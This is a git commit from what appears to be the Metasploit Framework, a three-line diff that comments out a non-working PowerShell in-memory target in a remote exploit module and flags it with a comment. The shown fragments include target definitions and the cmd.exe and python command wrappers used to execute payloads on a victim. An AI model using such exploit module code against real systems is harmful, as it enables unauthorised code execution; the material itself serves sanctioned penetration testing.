Comment out PSH target and explain why

I hope we can fix the PSH target in the future, but the Windows dropper
works today, and you can specify a custom EXE if you really want.
bug/bundler_fix
William Vu 2017-09-08 13:40:35 -05:00
parent a9a307540f
commit 978fdb07b0
1 changed files with 3 additions and 0 deletions

View File

@ -42,10 +42,12 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'python', 'Platform' => 'python',
'Arch' => ARCH_PYTHON 'Arch' => ARCH_PYTHON
], ],
=begin this stuff that doesn't work yet
['PowerShell (In-Memory)', ['PowerShell (In-Memory)',
'Platform' => 'win', 'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64]
], ],
=end
['Linux (Dropper)', ['Linux (Dropper)',
'Platform' => 'linux', 'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64] 'Arch' => [ARCH_X86, ARCH_X64]
@ -92,6 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
when /Python/ when /Python/
%W{python -c #{cmd}} %W{python -c #{cmd}}
when /PowerShell/ when /PowerShell/
# This doesn't work yet
%W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}} %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
when /Windows/ when /Windows/
%W{cmd.exe /c #{cmd}} %W{cmd.exe /c #{cmd}}